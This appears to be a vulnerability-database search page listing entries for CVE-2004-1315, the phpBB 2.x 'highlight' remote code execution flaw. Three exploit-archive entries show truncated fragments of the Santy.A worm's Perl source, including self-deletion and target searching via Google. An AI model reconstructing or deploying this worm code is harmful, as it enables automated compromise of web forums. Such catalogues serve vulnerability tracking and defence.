Lucene search
K

5 matches found

Cvelist
Cvelist
added 2004/12/31 5:0 a.m.24 views

CVE-2004-1315

viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...

7.3AI score0.71903EPSS
Exploits11References11
exploitpack
exploitpack
added 2004/12/22 12:0 a.m.15 views

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...

0.2AI score
Exploits0
0day.today
0day.today
added 2004/12/22 12:0 a.m.34 views

phpBB highlight Arbitrary File Upload (Santy.A)

Exploit for unknown platform in category web applications =============================================== phpBB highlight Arbitrary File Upload Santy.A =============================================== Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0;...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/12/22 12:0 a.m.71 views

phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload

Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...

7.4AI score
Exploits0
NVD
NVD
added 2004/11/12 5:0 a.m.19 views

CVE-2004-1315

viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...

7.5CVSS7.4AI score0.71903EPSS
Exploits11References11
Rows per page
Query Builder